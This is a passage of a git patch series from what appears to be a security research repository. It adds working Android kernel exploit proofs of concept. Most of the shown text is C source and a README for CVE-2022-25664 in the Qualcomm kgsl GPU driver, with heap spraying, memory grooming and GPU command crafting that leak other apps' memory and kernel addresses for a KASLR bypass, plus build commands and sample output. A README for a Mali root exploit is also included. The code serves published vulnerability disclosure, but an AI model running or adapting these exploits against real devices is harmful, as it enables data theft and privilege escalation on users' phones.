+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32
+
+#endif
From b209d0e45893d330f1e7c512b08250b16d20a990 Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Mon, 23 Jan 2023 15:23:20 +0000
Subject: [PATCH 05/53] Correct CVE number.
---
SecurityExploits/Android/Mali/CVE_2022_38181/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/README.md b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
index 71df73d..b89efc7 100644
--- a/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
@@ -1,4 +1,4 @@
-## Exploit for CVE-2022-20186
+## Exploit for CVE-2022-38181
The write up can be found [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug). This is a bug in the Arm Mali kernel driver that I reported in July 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
From 1be133fe561e453987d8a6e7439bd576a6a6a274 Mon Sep 17 00:00:00 2001
From: JarLob
Date: Thu, 16 Feb 2023 13:17:08 +0100
Subject: [PATCH 06/53] Add Ruby to the list
---
.github/ISSUE_TEMPLATE/all-for-one.yml | 1 +
1 file changed, 1 insertion(+)
diff --git a/.github/ISSUE_TEMPLATE/all-for-one.yml b/.github/ISSUE_TEMPLATE/all-for-one.yml
index 80c62dc..45c44ee 100644
--- a/.github/ISSUE_TEMPLATE/all-for-one.yml
+++ b/.github/ISSUE_TEMPLATE/all-for-one.yml
@@ -34,6 +34,7 @@ body:
- Javascript
- GoLang
- Python
+ - Ruby
- C/C++
- C#
validations:
From 3cd53e14a97bcd7854fb64f6bd03c1ce93bf216a Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Tue, 21 Feb 2023 11:29:33 +0000
Subject: [PATCH 07/53] Initial commit.
---
.../Android/Qualcomm/CVE_2022_25664/README.md | 48 ++++
.../CVE_2022_25664/adreno_kernel/adreno_cmd.c | 76 ++++++
.../CVE_2022_25664/adreno_kernel/adreno_cmd.h | 40 +++
.../adreno_kernel/adreno_kernel.c | 225 +++++++++++++++++
.../CVE_2022_25664/adreno_kernel/dma_search.h | 94 +++++++
.../CVE_2022_25664/adreno_kernel/kgsl_utils.c | 80 ++++++
.../CVE_2022_25664/adreno_kernel/kgsl_utils.h | 237 ++++++++++++++++++
.../CVE_2022_25664/adreno_user/adreno.h | 218 ++++++++++++++++
.../CVE_2022_25664/adreno_user/adreno_user.c | 221 ++++++++++++++++
9 files changed, 1239 insertions(+)
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md
new file mode 100644
index 0000000..cfb7192
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md
@@ -0,0 +1,48 @@
+## CVE-2022-25664
+
+The write up can be found [here](https://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident). This is a bug in the Qualcomm kgsl driver that I reported in December 2021. The bug can be used to leak information in other user apps, as well as in the kernel from an untrusted app.
+
+The directory `adreno_user` contains a proof-of-concept for leaking memory from other applications. It'll repeatedly trigger the bug and read the stale information contained in memory pages. There is no telling or control over what information is being leaked. To test this, compile with the following command:
+
+```
+aarch64-linux-android30-clang -O2 adreno_user.c -o adreno_user
+```
+
+and then push `adreno_user` to the device and run it. It should print out non zero memory content:
+
+```
+flame:/ $ /data/local/tmp/adreno_user
+hexdump(0x50000000, 0x190)
+00000000 0d 00 00 00 00 00 00 00 22 55 00 00 00 00 00 00 |........"U......|
+00000010 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
+00000020 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|
+00000030 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000040 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
+00000050 cb e9 67 e5 73 00 00 b4 00 00 00 00 00 00 00 00 |..g.s...........|
+00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000070 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000080 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+000000a0 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
+.......
+```
+
+The directory `adreno_kernel` contains a proof-of-concept for leaking kernel information for KASLR bypass. It'll repeatedly trigger the bug and tries to leak kernel addresses. Depending on whether the device is running kernel branch 4.x or 5.x, the Macro `KERNEL_BRANCH` in `adreno_kernel.c` should be set to either `4` or `5`.
+
+To test, compile with
+
+```
+aarch64-linux-android30-clang adreno_kernel.c adreno_cmd.c kgsl_utils.c -O3 -o adreno_kernel
+```
+
+and then run it on the device. If successful, it should print out the kernel addresses of some objects and functions:
+
+```
+flame:/ $ /data/local/tmp/adreno_kernel
+found dma fence object:
+kgsl_syncsource_fence_ops address: ffffff9daaea8b48
+object address: fffffffe116100a0
+syncsource address: fffffffe0b244480
+```
+
+It has been tested on a number of devices. The time it takes (depends on the success rate of a single leak) varies across devices. It is relatively quick Pixel 4, but takes longer on the Samsung Z flip 3.
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c
new file mode 100644
index 0000000..9a9b279
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c
@@ -0,0 +1,76 @@
+#include "adreno_cmd.h"
+
+uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr)
+{
+ uint *start = cmds;
+
+ *cmds++ = lower_32_bits(gpuaddr);
+ *cmds++ = upper_32_bits(gpuaddr);
+
+ return cmds - start;
+}
+
+uint pm4_calc_odd_parity_bit(uint val) {
+ return (0x9669 >> (0xf & ((val) ^
+ ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^
+ ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^
+ ((val) >> 28)))) & 1;
+}
+
+uint cp_type7_packet(uint opcode, uint cnt) {
+ return CP_TYPE7_PKT | ((cnt) << 0) |
+ (pm4_calc_odd_parity_bit(cnt) << 15) |
+ (((opcode) & 0x7F) << 16) |
+ ((pm4_calc_odd_parity_bit(opcode) << 23));
+}
+
+uint cp_wait_for_me(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0);
+
+ return cmds - start;
+}
+
+uint cp_mem_packet(int opcode, uint size, uint num_mem) {
+ return cp_type7_packet(opcode, size + num_mem);
+}
+
+uint cp_wait_for_idle(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0);
+
+ return cmds - start;
+}
+
+uint cp_type4_packet(uint opcode, uint cnt)
+{
+ return CP_TYPE4_PKT | ((cnt) << 0) |
+ (pm4_calc_odd_parity_bit(cnt) << 7) |
+ (((opcode) & 0x3FFFF) << 8) |
+ ((pm4_calc_odd_parity_bit(opcode) << 27));
+}
+
+uint cp_register(
+ unsigned int reg, unsigned int size)
+{
+ return cp_type4_packet(reg, size);
+}
+
+uint cp_invalidate_state(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3);
+ *cmds++ = 0x40000;
+ *cmds++ = 0;
+ *cmds++ = 0;
+
+ return cmds - start;
+}
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h
new file mode 100644
index 0000000..01cfeb5
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h
@@ -0,0 +1,40 @@
+#ifndef ADRENO_CMD_H
+#define ADRENO_CMD_H
+
+#include
+
+#define CP_TYPE4_PKT (4 << 28)
+#define CP_TYPE7_PKT (7 << 28)
+
+#define CP_NOP 0x10
+#define CP_WAIT_FOR_ME 0x13
+#define CP_WAIT_FOR_IDLE 0x26
+#define CP_WAIT_REG_MEM 0x3c
+#define CP_MEM_WRITE 0x3d
+#define CP_INDIRECT_BUFFER_PFE 0x3f
+#define CP_SET_DRAW_STATE 0x43
+#define CP_MEM_TO_MEM 0x73
+#define CP_SET_PROTECTED_MODE 0x5f
+
+#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
+#define lower_32_bits(n) ((uint32_t)(n))
+
+uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr);
+
+uint pm4_calc_odd_parity_bit(uint val);
+
+uint cp_type7_packet(uint opcode, uint cnt);
+
+uint cp_wait_for_me(uint *cmds);
+
+uint cp_mem_packet(int opcode, uint size, uint num_mem);
+
+uint cp_wait_for_idle(uint *cmds);
+
+uint cp_type4_packet(uint opcode, uint cnt);
+
+uint cp_register(unsigned int reg, unsigned int size);
+
+uint cp_invalidate_state(uint *cmds);
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c
new file mode 100644
index 0000000..474f706
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c
@@ -0,0 +1,225 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+#include "kgsl_utils.h"
+#include "adreno_cmd.h"
+#include "dma_search.h"
+
+#define CMD_SIZE 4
+
+#define OBJS_PER_SLAB (0x1000/OBJECT_SIZE)
+
+#define CPU_PARTIAL 30
+
+#define MMAP_SPRAY 1000
+
+#define OBJ_SPRAY 10000
+
+#define CPU_SETSIZE 1024
+#define __NCPUBITS (8 * sizeof (unsigned long))
+typedef struct
+{
+ unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
+} cpu_set_t;
+
+#define CPU_SET(cpu, cpusetp) \
+ ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
+#define CPU_ZERO(cpusetp) \
+ memset((cpusetp), 0, sizeof(cpu_set_t))
+
+#define KERNEL_BRANCH KERNEL_4
+
+void migrate_to_cpu(int i)
+{
+ int syscallres;
+ pid_t pid = gettid();
+ cpu_set_t cpu;
+ CPU_ZERO(&cpu);
+ CPU_SET(i, &cpu);
+
+ syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
+ if (syscallres)
+ {
+ err(1, "Error in the syscall setaffinity");
+ }
+}
+
+static uint32_t* map_anon(int kgsl_fd, uint64_t* addr, size_t size) {
+ uint32_t* out = NULL;
+ out = (uint32_t*)mmap(NULL, size, PROT_READ|PROT_WRITE,
+ MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ if (out == MAP_FAILED) {
+ err(1, "shared_mem_buf failed");
+ }
+ int ret = kgsl_map(kgsl_fd, (unsigned long)out, size, addr, 0);
+
+ if (ret == -1) {
+ err(1, "kgsl_map failed %p\n", out);
+ }
+ return out;
+}
+
+static uint32_t write_gpu_cmd(uint32_t* write_cmd_buf, uint64_t shared_mem_gpuaddr, uint32_t n) {
+ uint32_t* write_cmds;
+
+ write_cmd_buf = write_cmd_buf + 0x1000/CMD_SIZE - 5;
+
+ write_cmds = write_cmd_buf;
+
+ *write_cmds++ = cp_type7_packet(CP_NOP, 1);
+ *write_cmds++ = 0xffffffff;
+
+ *write_cmds++ = cp_type7_packet(CP_MEM_WRITE, 2 + n);
+
+ write_cmds += cp_gpuaddr(write_cmds, shared_mem_gpuaddr);
+
+ return (write_cmds - write_cmd_buf + n) * CMD_SIZE;
+}
+
+
+static int io_setup(unsigned nr, aio_context_t *ctxp)
+{
+ return syscall(__NR_io_setup, nr, ctxp);
+}
+
+static int io_destroy(aio_context_t ctx)
+{
+ return syscall(__NR_io_destroy, ctx);
+}
+
+int find_address() {
+ uint32_t *write_cmd_buf;
+ uint64_t *shared_mem_buf;
+ void *shared_mem_buf2;
+ uint64_t shared_mem_gpuaddr2;
+ uint32_t n = 2048;
+ uint64_t shared_mem_size = 0x2000;
+ uint32_t cmd_size;
+ uint64_t write_cmd_gpuaddr = 0;
+ uint64_t shared_mem_gpuaddr = 0;
+ uint64_t hole_size = 0x1000;
+ int fds[OBJS_PER_SLAB * CPU_PARTIAL];
+ int spray_fds[OBJ_SPRAY];
+
+ int fd = open("/dev/kgsl-3d0", O_RDWR);
+
+ if (fd == -1) {
+ err(1, "cannot open kgsl");
+ }
+
+ uint32_t ctx_id;
+ if (kgsl_ctx_create(fd, &ctx_id)) {
+ err(1, "kgsl_ctx_create failed.");
+ }
+
+ struct kgsl_syncsource_create syncsource = {0};
+ if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE, &syncsource) < 0) {
+ err(1, "unable to create syncsource\n");
+ }
+
+ for (int i = 0; i < OBJ_SPRAY; i++) {
+ struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id};
+ if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) {
+ err(1, "Failed to create fence");
+ }
+ spray_fds[i] = create_fence.fence_fd;
+ }
+
+ for (int i = 0; i < CPU_PARTIAL * OBJS_PER_SLAB; i++) {
+ struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id};
+ if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) {
+ err(1, "Failed to create fence");
+ }
+ fds[i] = create_fence.fence_fd;
+ }
+
+ shared_mem_buf = (uint64_t*)map_anon(fd, &shared_mem_gpuaddr, shared_mem_size);
+ write_cmd_buf = map_anon(fd, &write_cmd_gpuaddr, 0x1000);
+ uint64_t write_cmd_gpuaddr_start = write_cmd_gpuaddr;
+
+ write_cmd_gpuaddr = write_cmd_gpuaddr + 0x1000 - 5 * CMD_SIZE;
+
+ uint32_t* write_cmd_buf_start = write_cmd_buf;
+ cmd_size = write_gpu_cmd(write_cmd_buf, shared_mem_gpuaddr, n);
+
+ usleep(50000);
+ void* hole = mmap(NULL, hole_size, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ shared_mem_buf2 = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+ if (shared_mem_buf2 == MAP_FAILED) {
+ err(1, "shared_mem_buf2 failed");
+ }
+
+ munmap(hole, hole_size);
+ aio_context_t ctx = 0;
+ uint32_t nr_events = 32;
+
+ migrate_to_cpu(0);
+ for (int i = 0; i < OBJS_PER_SLAB; i++) {
+ close(fds[i + (CPU_PARTIAL - 1) * OBJS_PER_SLAB]);
+ }
+
+ for (int i = 0; i < (CPU_PARTIAL - 1); i++) {
+ close(fds[i * OBJS_PER_SLAB]);
+ }
+
+ if (io_setup(nr_events, &ctx) < 0) err(1, "io_setup error\n");
+ if (kgsl_map(fd, (unsigned long) shared_mem_buf2, shared_mem_size, &shared_mem_gpuaddr2, 1) == -1) {
+ err(1, "kgsl_map failed (shared_mem_buf2)");
+ }
+
+ if (kgsl_gpu_command_payload(fd, ctx_id, 0, cmd_size, 1, 0, write_cmd_gpuaddr, cmd_size)) {
+ err(1, "gpu_command failed.");
+ }
+ usleep(150000);
+ if (shared_mem_gpuaddr2 != write_cmd_gpuaddr_start + 0x1000) {
+ err(1, "wrong address layout shared_mem_gpuaddr2 %lx write_cmd_gpuaddr %lx\n", shared_mem_gpuaddr2, write_cmd_gpuaddr);
+ }
+ if (ctx != (uint64_t)shared_mem_buf2 + 0x1000) {
+ err(1, "wrong address layout shared_mem_buf2 %p ctx %lx\n", shared_mem_buf2, ctx);
+ }
+
+ int ret = dma_search(shared_mem_buf + 0x1000/8, 0x1000/8, KERNEL_BRANCH);
+ if (ret == -1) {
+ io_destroy(ctx);
+ munmap(shared_mem_buf2, 0x1000);
+ munmap(shared_mem_buf, 0x2000);
+ munmap(write_cmd_buf, 0x1000);
+ for (int i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) close(fds[i]);
+ for (int i = 0; i < OBJ_SPRAY; i++) close(spray_fds[i]);
+ close(fd);
+ }
+ return ret;
+}
+
+int main() {
+
+ for (int i = 0; i < MMAP_SPRAY; i++) {
+ mmap(NULL, 0x1000,PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ }
+ int success = -1;
+ int counter = 0;
+ while (success == -1) {
+ success = find_address();
+ counter++;
+ if (counter % 20 == 0) printf("failed after %d\n", counter);
+ }
+
+}
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h
new file mode 100644
index 0000000..b103107
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h
@@ -0,0 +1,94 @@
+#ifndef DMA_SEARCH_H
+#define DMA_SEARCH_H
+
+#include
+#include
+
+#define OBJECT_SIZE 128
+
+#define STRIDE (OBJECT_SIZE/8)
+
+struct dma_info {
+ uint64_t ops;
+ uint64_t cb_list;
+ uint64_t spinlock;
+ uint64_t context;
+};
+
+enum dma_search_type {
+ KERNEL_4,
+ KERNEL_5
+};
+
+int try_match_object_54(uint64_t* obj, struct dma_info* out) {
+ //No ops
+ if (obj[1] == 0) return 0;
+ //cb_list not initialized
+ if (obj[2] != obj[3]) return 0;
+ //no cb_list
+ if (obj[2] == 0 || obj[3] == 0) return 0;
+ if (out->ops == 0) {
+ out->ops = obj[1];
+ out->cb_list = obj[2];
+ out->context = obj[4];
+ return 1;
+ }
+ if (out->ops != obj[1]) {
+ printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]);
+ return 0;
+ }
+ return 1;
+}
+
+int try_match_object_414(uint64_t* obj, struct dma_info* out) {
+ //No ops
+ if (obj[1] == 0) return 0;
+ //rcu not zero
+ if (obj[2] != 0 || obj[3] != 0) return 0;
+ //cb_list not initialized
+ if (obj[4] != obj[5]) return 0;
+ //no cb_list
+ if (obj[4] == 0 || obj[5] == 0) return 0;
+ //no spinlock
+ if (obj[6] == 0) return 0;
+ if (out->ops == 0) {
+ out->ops = obj[1];
+ out->cb_list = obj[4];
+ out->spinlock = obj[6];
+ out->context = obj[7];
+ return 1;
+ }
+ if (out->ops != obj[1]) {
+ printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]);
+ return 0;
+ }
+ if (out->spinlock != obj[6]) {
+ printf("out->spinlock %lx obj[6] %lx\n", out->spinlock, obj[6]);
+ return 0;
+ }
+ return 1;
+};
+
+int dma_search(uint64_t* region, size_t len, enum dma_search_type type) {
+ if (len % OBJECT_SIZE != 0) err(1, "len is not divisible by object size\n");
+ struct dma_info info = {0};
+ int match = 0;
+ for (int i = 0; i < len; i+= STRIDE) {
+ if (type == KERNEL_4) {
+ match += try_match_object_414(region + i, &info);
+ } else if (type == KERNEL_5){
+ match += try_match_object_54(region + i, &info);
+ } else {
+ err(1, "unknown kernel branch\n");
+ }
+ }
+ if (match > 3) {
+ printf("found dma fence object:\n");
+ printf("kgsl_syncsource_fence_ops address: %lx\n", info.ops);
+ printf("object address: %lx\n", info.cb_list);
+ return 1;
+ }
+ return -1;
+};
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c
new file mode 100644
index 0000000..1fc3c5a
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c
@@ -0,0 +1,80 @@
+#include
+
+#include "kgsl_utils.h"
+
+int kgsl_ctx_create(int fd, uint32_t *ctx_id)
+{
+ struct kgsl_drawctxt_create req = {
+ .flags = 0x00001812,
+ };
+ int ret;
+
+ ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &req);
+ if (ret)
+ return ret;
+
+ *ctx_id = req.drawctxt_id;
+
+ return 0;
+}
+
+int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size) {
+ struct kgsl_command_object *cmds;
+
+ struct kgsl_gpu_command req = {
+ .context_id = ctx_id,
+ .cmdsize = sizeof(struct kgsl_command_object),
+ .numcmds = n,
+ };
+ size_t cmds_size;
+ uint32_t i;
+
+ cmds_size = n * sizeof(struct kgsl_command_object);
+
+ cmds = (struct kgsl_command_object *) malloc(cmds_size);
+
+ if (cmds == NULL) {
+ return -1;
+ }
+
+ memset(cmds, 0, cmds_size);
+
+ for (i = 0; i < n; i++) {
+ cmds[i].flags = KGSL_CMDLIST_IB;
+
+ if (i == target_idx) {
+ cmds[i].gpuaddr = target_cmd;
+ cmds[i].size = target_size;
+ }
+ else {
+ /* the shift here is helpful for debugging failed alignment */
+ cmds[i].gpuaddr = gpuaddr + (i << 16);
+ cmds[i].size = cmdsize;
+ }
+ }
+ req.cmdlist = (unsigned long) cmds;
+ return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req);
+}
+
+int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly) {
+ struct kgsl_map_user_mem req = {
+ .len = len,
+ .offset = 0,
+ .hostptr = addr,
+ .memtype = KGSL_USER_MEM_TYPE_ADDR,
+// .flags = KGSL_MEMFLAGS_USE_CPU_MAP,
+ };
+ if (readonly) {
+ req.flags |= KGSL_MEMFLAGS_GPUREADONLY;
+ }
+ int ret;
+
+ ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &req);
+ if (ret)
+ return ret;
+
+ *gpuaddr = req.gpuaddr;
+
+ return 0;
+}
+
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h
new file mode 100644
index 0000000..79033dc
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h
@@ -0,0 +1,237 @@
+#ifndef KGSL_UTILS_H
+#define KGSL_UTILS_H
+
+#include
+#include
+#include
+
+#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
+
+#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U
+
+#define KGSL_OBJLIST_MEMOBJ 0x00000008U
+#define KGSL_OBJLIST_PROFILE 0x00000010U
+#define KGSL_DRAWOBJ_PROFILING 0x00000010
+#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31)
+
+enum kgsl_user_mem_type {
+ KGSL_USER_MEM_TYPE_PMEM = 0x00000000,
+ KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,
+ KGSL_USER_MEM_TYPE_ADDR = 0x00000002,
+ KGSL_USER_MEM_TYPE_ION = 0x00000003,
+ /*
+ * ION type is retained for backwards compatibility but Ion buffers are
+ * dma-bufs so try to use that naming if we can
+ */
+ KGSL_USER_MEM_TYPE_DMABUF = 0x00000003,
+ KGSL_USER_MEM_TYPE_MAX = 0x00000007,
+};
+
+struct kgsl_timeline_fence_get {
+ __u64 seqno;
+ __u32 timeline;
+ int handle;
+};
+
+#define IOCTL_KGSL_TIMELINE_FENCE_GET \
+ _IOWR(KGSL_IOC_TYPE, 0x5C, struct kgsl_timeline_fence_get)
+
+
+struct kgsl_timeline_create {
+ __u64 seqno;
+ __u32 id;
+/* private: padding for 64 bit compatibility */
+ __u32 padding;
+};
+
+#define IOCTL_KGSL_TIMELINE_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x58, struct kgsl_timeline_create)
+
+#define IOCTL_KGSL_TIMELINE_DESTROY _IOW(KGSL_IOC_TYPE, 0x5D, __u32)
+
+struct kgsl_device_getproperty {
+ unsigned int type;
+ void *value;
+ size_t sizebytes;
+};
+
+#define IOCTL_KGSL_DEVICE_GETPROPERTY \
+ _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty)
+
+
+struct kgsl_gpumem_alloc_id {
+ unsigned int id;
+ unsigned int flags;
+ uint64_t size;
+ uint64_t mmapsize;
+ unsigned long gpuaddr;
+};
+
+#define IOCTL_KGSL_GPUMEM_ALLOC_ID \
+ _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id)
+
+struct kgsl_command_object {
+ uint64_t offset;
+ uint64_t gpuaddr;
+ uint64_t size;
+ unsigned int flags;
+ unsigned int id;
+};
+
+struct kgsl_gpu_command {
+ uint64_t flags;
+ uint64_t __user cmdlist;
+ unsigned int cmdsize;
+ unsigned int numcmds;
+ uint64_t __user objlist;
+ unsigned int objsize;
+ unsigned int numobjs;
+ uint64_t __user synclist;
+ unsigned int syncsize;
+ unsigned int numsyncs;
+ unsigned int context_id;
+ unsigned int timestamp;
+};
+
+struct kgsl_map_user_mem {
+ int fd;
+ unsigned long gpuaddr; /*output param */
+ size_t len;
+ size_t offset;
+ unsigned long hostptr; /*input param */
+ enum kgsl_user_mem_type memtype;
+ unsigned int flags;
+};
+
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+
+#define KGSL_IOC_TYPE 0x09
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+#define IOCTL_KGSL_MAP_USER_MEM \
+ _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)
+
+#define IOCTL_KGSL_GPU_COMMAND \
+ _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command)
+
+#define KGSL_CMDLIST_IB 0x00000001U
+#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
+
+struct kgsl_gpuobj_import {
+ uint64_t __user priv;
+ uint64_t priv_len;
+ uint64_t flags;
+ unsigned int type;
+ unsigned int id;
+};
+
+struct kgsl_gpuobj_import_dma_buf {
+ int fd;
+};
+
+struct kgsl_gpuobj_import_useraddr {
+ uint64_t virtaddr;
+};
+
+struct kgsl_gpuobj_free {
+ uint64_t flags;
+ uint64_t __user priv;
+ unsigned int id;
+ unsigned int type;
+ unsigned int len;
+};
+
+#define KGSL_GPUOBJ_FREE_ON_EVENT 1
+
+#define KGSL_GPU_EVENT_TIMESTAMP 1
+#define KGSL_GPU_EVENT_FENCE 2
+
+struct kgsl_gpu_event_timestamp {
+ unsigned int context_id;
+ unsigned int timestamp;
+};
+
+struct kgsl_gpu_event_fence {
+ int fd;
+};
+
+struct kgsl_gpumem_free_id {
+ unsigned int id;
+/* private: reserved for future use*/
+ unsigned int __pad;
+};
+
+#define IOCTL_KGSL_GPUMEM_FREE_ID _IOWR(KGSL_IOC_TYPE, 0x35, struct kgsl_gpumem_free_id)
+
+#define IOCTL_KGSL_GPUOBJ_FREE \
+ _IOW(KGSL_IOC_TYPE, 0x46, struct kgsl_gpuobj_free)
+
+struct dma_buf_sync {
+ __u64 flags;
+};
+
+#define DMA_BUF_SYNC_READ (1 << 0)
+#define DMA_BUF_SYNC_WRITE (2 << 0)
+#define DMA_BUF_SYNC_RW (DMA_BUF_SYNC_READ | DMA_BUF_SYNC_WRITE)
+#define DMA_BUF_SYNC_START (0 << 2)
+#define DMA_BUF_SYNC_END (1 << 2)
+#define DMA_BUF_SYNC_USER_MAPPED (1 << 3)
+
+#define DMA_BUF_SYNC_VALID_FLAGS_MASK \
+ (DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END)
+
+#define DMA_BUF_BASE 'b'
+#define DMA_BUF_IOCTL_SYNC _IOW(DMA_BUF_BASE, 0, struct dma_buf_sync)
+
+#define KGSL_MEMFLAGS_FORCE_32BIT 0x100000000ULL
+
+
+struct kgsl_syncsource_create {
+ unsigned int id;
